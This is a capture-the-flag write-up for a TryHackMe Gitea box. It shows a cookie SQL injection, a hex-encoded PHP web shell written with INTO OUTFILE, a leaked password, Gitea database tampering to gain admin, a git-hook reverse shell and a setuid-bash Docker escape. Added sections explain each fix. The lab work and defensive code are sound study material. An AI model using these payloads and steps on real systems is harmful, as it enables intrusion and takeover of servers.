Enumeration
Let's start with a simple nmap scan.
nmap -sVC 10.10.104.237
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-30 13:45 +0545
Nmap scan report for 10.10.104.237 (10.10.104.237)
Host is up (0.17s latency).
Not shown: 983 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e4:c9:dd:9b:db:95:9e:fd:19:a9:a6:0d:4c:43:9f:fa (RSA)
| 256 c3:fc:10:d8:78:47:7e:fb:89:cf:81:8b:6e:f1:0a:fd (ECDSA)
|_ 256 27:68:ff:ef:c0:68:e2:49:75:59:34:f2:bd:f0:c9:20 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Canis Queue
|_http-server-header: Apache/2.4.29 (Ubuntu)
843/tcp filtered unknown
1002/tcp filtered windows-icfw
1069/tcp filtered cognex-insight
1074/tcp filtered warmspotMgmt
2041/tcp filtered interbase
3367/tcp filtered satvid-datalnk
3690/tcp filtered svn
3809/tcp filtered apocd
7921/tcp filtered unknown
8654/tcp filtered unknown
9040/tcp filtered tor-trans
10566/tcp filtered unknown
10629/tcp filtered unknown
16992/tcp filtered amt-soap-http
24800/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.44 seconds
Hmm, let's check port 80.
Hmm, let's do directory busting. Hmmm, nothing interesting there.
Let's try subdomain and vhost enumeration, but the room hasn't provided us with a specific domain name.
Let's use nikto.
Hmm, nothing useful, I guess.
Exploit
There is something in the cookie.
Random strings.
Hmmm.
Is it like a hash or something?
Let's change that.
And something changed, but why an error? Does it need a fixed-size string or something? Let's try. But only an error showed up.
I spent a lot of time and got the hint of SQL.
If the server uses that cookie value in a query to determine the result, then it might be vulnerable.
Okay, but it was unexpected.
Let's try to exploit it.
After many tries, we finally got the right payload, and one without a ; in it.
2ccffd5893d5c6ea78c8fd68813a773d' UNION SELECT 1,2-- -
Uff, it's so random. Okay, let's enumerate the database.
I captured the request in Caido to make it easy.
I was trying different things, like enumerating tables, columns, etc., and got this message.
Now I have a strong feeling that RCE might be possible. Let's try.
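Here is an added example (not from the original writeup) of what that cookie lookup probably looks like on the server side, and how it is fixed. The queue table, its columns and the second token are constructed stand-ins; the first token is the cookie value shown above. The UNION payload only works because the cookie is concatenated into the SQL string; a bound parameter, plus an allow-list check on the 32-hex-character format, shuts it down:

```python
import re
import sqlite3

# Constructed stand-in for the table the Canis Queue cookie is presumably
# looked up in; the column names and rows are assumptions, not the room's
# real schema. The first token is the cookie value from the writeup.
TOKENS = [
    ("2ccffd5893d5c6ea78c8fd68813a773d", 17),
    ("0f1e2d3c4b5a69788796a5b4c3d2e1f0", 3),  # constructed
]

# The cookie on the page is 32 lowercase hex characters, so anything else
# can be rejected before it ever reaches the database.
HEX32 = re.compile(r"\A[0-9a-f]{32}\Z")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE queue (id INTEGER PRIMARY KEY, token TEXT, position INTEGER)"
    )
    conn.executemany("INSERT INTO queue (token, position) VALUES (?, ?)", TOKENS)
    return conn


def valid_token(cookie):
    """Allow-list check: True only for a 32-character lowercase hex string."""
    return HEX32.match(cookie) is not None


def lookup_vulnerable(conn, cookie):
    """Cookie spliced into the statement: a quote inside it ends the string
    literal and everything after is parsed as SQL (the UNION in the writeup)."""
    sql = f"SELECT id, position FROM queue WHERE token = '{cookie}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, cookie):
    """Bound parameter: the driver passes the cookie as data, never as SQL,
    so the whole payload is compared against the token column and matches nothing."""
    return conn.execute(
        "SELECT id, position FROM queue WHERE token = ?", (cookie,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "2ccffd5893d5c6ea78c8fd68813a773d' UNION SELECT 1,2-- -"
    print("vulnerable:", lookup_vulnerable(db, payload))  # attacker-chosen row (1, 2) appears
    print("safe:      ", lookup_safe(db, payload))        # []
    print("format ok: ", valid_token(payload))            # False
```

Either fix alone blocks the injection; the format check is defense in depth and also makes the "random string" error the writeup hit a deliberate, logged rejection rather than a database error.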
Foothold
And I guess it worked.
2ccffd5893d5c6ea78c8fd68813a773d'UNION SELECT 1, 0x3C3F7068702073797374656D28245F4745545B22636D64225D293B203F3E INTO OUTFILE '/var/www/html/shell.php' -- -
Let's try to execute a command.
Let's get a reverse shell.
And now we are inside.
Let's see what I can do.
We got one password.
Hmm, so there is use of git and Gitea.
Privilege Escalation with Password Leak
Let's see that work_analysis.
Hmm, this is some kind of log file.
Let's see, this might contain some creds.
And I guess we got it at first.
Let's try to log in.
Ohh, I thought it was dylanLabr4d0rs4L1f3, but it was only Labr4d0rs4L1f3.
THM{OTE3MTQyNTM5NzRiN2VjNTQyYWM2M2Ji}
Privilege Escalation and Docker Escape
Now let's do privilege escalation.
Let's see that git thing from before.
Hmm.
Running linpeas, we can see this.
Let's forward this port to our system via SSH.
ssh -L 3000:localhost:3000 dylan@ip
And now we can access it via http://localhost:3000 on our local machine.
Let's see what we can do.
I tried logging in with Dylan's email and password.
Email:dylan@yearofthedog.thm
Pass:Labr4d0rs4L1f3
(Email can be found in several git directories on the machine.)
But it also needs a passcode.
Hmm, is there any passcode stored there or anything like that? Let's see.
grep -Ri "passcode" .
Hmm, something in ./gitea/log/gitea.log and ./gitea/gitea.db. Let's check that out.
That log file has something, but gitea.db has a lot.
Let's download the file via a Python server and use sqlite3.
We can do this to get tables.
.tables
And do this.
SELECT * FROM two_factor;
And we will get a token.
I also tried registering a user.
After that, I downloaded the .db file again, and there is our user.
After a few chats with ChatGPT, because I am weak at using sqlite3, we can check the info of the columns.
PRAGMA table_info(user);
So there is is_admin at the 26th index.
Let's see the result of
SELECT * FROM user;
Or, more easily,
select lower_name,is_admin from user;
So here the user hack isn't admin.
Let's change that to admin.
UPDATE user SET is_admin = 1 WHERE lower_name = 'hack';
So now user hack is admin.
Now let's replace that .db file on the victim machine with our new one.
scp gitea.db dylan@ip:/gitea/gitea/gitea.db
And now, refreshing the page, we can see the administration page.
(I changed the username to hehe in what follows because the machine expired.)
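As an added example (not part of the writeup), here is how a defender would check a copy of gitea.db for exactly this kind of tampering: find is_admin by name with PRAGMA table_info instead of counting to index 26, diff the admin set against a known baseline, and flag admins that have no two_factor row. The schema below is a constructed, trimmed version of the two tables queried above; only the columns lower_name, email, is_admin (user) and uid, secret (two_factor) are assumed, and every row other than Dylan's email is made up:

```python
import sqlite3

# Constructed, cut-down stand-in for the two Gitea tables the writeup reads.
# The real gitea.db has far more columns; only the ones named here are assumed.
SCHEMA = """
CREATE TABLE user (
    id INTEGER PRIMARY KEY, lower_name TEXT, email TEXT, is_admin INTEGER
);
CREATE TABLE two_factor (
    id INTEGER PRIMARY KEY, uid INTEGER, secret TEXT
);
INSERT INTO user VALUES (1, 'dylan', 'dylan@yearofthedog.thm', 1);
INSERT INTO user VALUES (2, 'hack',  'hack@example.invalid', 0);  -- constructed
INSERT INTO two_factor VALUES (1, 1, 'constructed-totp-secret');
"""


def make_gitea_like_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def column_index(conn, table, column):
    """Locate a column by name via PRAGMA table_info instead of counting
    positions by hand; each row is (cid, name, type, notnull, dflt_value, pk).
    The table name comes from our own code, never from user input."""
    for cid, name, *_ in conn.execute(f"PRAGMA table_info({table})"):
        if name == column:
            return cid
    raise KeyError(f"{table} has no column {column}")


def audit_admins(conn, expected_admins):
    """Compare the is_admin column against a baseline and report admins with
    no two_factor row; a direct UPDATE like the one in the writeup shows up
    in both lists."""
    admins = {name for (name,) in conn.execute(
        "SELECT lower_name FROM user WHERE is_admin = 1")}
    no_2fa = [name for (name,) in conn.execute(
        "SELECT u.lower_name FROM user u "
        "LEFT JOIN two_factor t ON t.uid = u.id "
        "WHERE u.is_admin = 1 AND t.id IS NULL ORDER BY u.lower_name")]
    return {
        "unexpected_admins": sorted(admins - set(expected_admins)),
        "admins_without_2fa": no_2fa,
    }


if __name__ == "__main__":
    db = make_gitea_like_db()
    print("is_admin column index:", column_index(db, "user", "is_admin"))
    print("baseline:", audit_admins(db, {"dylan"}))
    # Replay the writeup's change against the constructed copy and re-audit.
    db.execute("UPDATE user SET is_admin = 1 WHERE lower_name = 'hack'")
    print("after tamper:", audit_admins(db, {"dylan"}))
```

Run periodically against a snapshot of the live database, the diff of the admin set is the cheapest signal that the file was swapped out from under Gitea the way the scp above does; file-permission and integrity monitoring on the gitea.db path itself is the complementary control.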
And there is a repo called test-repo.
Now we can exploit this. (... .git/hooks/ directory of a repository, and they are executed when certain Git actions occur, such as git commit, git push, or git merge.) -chatgpt
So if we could edit it, we could run our script, and that might give us a root shell.
Let's see.
Let's add our rev shell here.
I will add 2-3 different reverse shells because some might not work.
Now let's clone that repo on the victim's machine to make that script run, because it runs automatically when any commit happens.
Let's do it.
git clone http://localhost:3000/Dylan/Test-Repo.git
cd Test-Repo/
echo "changes" >> README.md
git add .
git commit -m "changes"
git push
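Added example, not from the writeup or from Gitea: a small audit of a repository's hooks directory from the defender's side. Git only runs hooks that are executable and not named *.sample, so those are the files to list and review after an incident like this one. The bare-repo layout it builds is constructed, with a harmless placeholder hook body:

```python
import os
import stat
import tempfile

SAMPLE_SUFFIX = ".sample"  # stubs shipped by git, never executed


def active_hooks(hooks_dir):
    """Return (name, first line) for every hook Git would actually run:
    regular files in hooks/ that are executable and not *.sample stubs.
    The first line shows the interpreter, so a reviewer can triage quickly."""
    found = []
    for name in sorted(os.listdir(hooks_dir)):
        path = os.path.join(hooks_dir, name)
        st = os.lstat(path)  # lstat: a symlinked hook is itself suspicious
        if not stat.S_ISREG(st.st_mode) or name.endswith(SAMPLE_SUFFIX):
            continue
        if not st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
            continue
        with open(path, "r", errors="replace") as fh:
            first_line = fh.readline().rstrip("\n")
        found.append((name, first_line))
    return found


def build_demo_repo():
    """Constructed bare-repo layout: one untouched sample hook and one live
    post-receive hook with a harmless placeholder body (not the writeup's shell)."""
    root = tempfile.mkdtemp(prefix="hooks-audit-")
    hooks = os.path.join(root, "hooks")
    os.mkdir(hooks)
    with open(os.path.join(hooks, "pre-commit.sample"), "w") as fh:
        fh.write("#!/bin/sh\n# sample hook shipped by git\n")
    live = os.path.join(hooks, "post-receive")
    with open(live, "w") as fh:
        fh.write("#!/bin/bash\necho 'constructed placeholder hook'\n")
    os.chmod(live, 0o755)
    return hooks


if __name__ == "__main__":
    for name, shebang in active_hooks(build_demo_repo()):
        print(f"active hook: {name}  ({shebang})")
```

On a Gitea server the hooks live under the bare repositories in the data directory, so the same function can be pointed at each repo's hooks/ folder. The writeup needed an admin account before it could edit hooks at all; Gitea's DISABLE_GIT_HOOKS setting in the [security] section of app.ini turns that feature off entirely, which is the setting to check first after cleaning up.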
And we should now have got the shell in our listener.
Hmm, but this is a git shell.
Ohh, but with root privileges.
So we now have sudo to run anything as root.
And we are root, but in Docker.
Let's escape.
Because we are in the git shell, there might be something connected with the main host.
Let's check /app and /data.
And /data has the same things as the main host.
And /app also has gitea, but something is odd here.
Let's go to the main host's /gitea/gitea and do this.
cp /bin/bash .
Now, from that other Docker container as root, in /data/gitea,
chown root:root bash
chmod 4777 bash
Now we can go to the main host, and there will be a bash with setuid root.
And we are root.
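Added example (not from the writeup): the setuid bash copied into the shared /data/gitea volume is exactly what a host-side audit should catch. This walks a directory and returns every regular file carrying the setuid bit, with its owner. The directory it builds is a constructed stand-in with an empty placeholder named bash, not a real shell binary:

```python
import os
import stat
import tempfile


def find_setuid_files(root):
    """Walk root and return (relative path, owner uid) for every regular file
    with the setuid bit set. On a volume shared between a container and the
    host, any such file needs an explanation."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)  # lstat: do not follow symlinks out of the volume
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((os.path.relpath(path, root), st.st_uid))
    return sorted(hits)


def build_demo_volume():
    """Constructed stand-in for the shared gitea data directory: one ordinary
    file plus a copy of 'bash' with mode 4777 as in the writeup. The file is
    an empty placeholder, not a real shell binary."""
    root = tempfile.mkdtemp(prefix="volume-audit-")
    with open(os.path.join(root, "app.ini"), "w") as fh:
        fh.write("; constructed config placeholder\n")
    suid = os.path.join(root, "bash")
    open(suid, "w").close()
    os.chmod(suid, 0o4777)
    return root


if __name__ == "__main__":
    for rel, uid in find_setuid_files(build_demo_volume()):
        print(f"setuid file: {rel} (owner uid {uid})")
```

Two controls make this step fail outright: mounting volumes that a container shares with the host with the nosuid mount option, so the kernel ignores the bit at exec time, and not running the container's git service as root in the first place, since the chown to root:root is what gives the bit its value.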
THM{MzlhNGY5YWM0ZTU5ZGQ0OGI0YTc0OWRh}
Done
And done.
Learned lots of things again. I hope you are doing great. Take care :).
Refs: revshell.com, full tty shell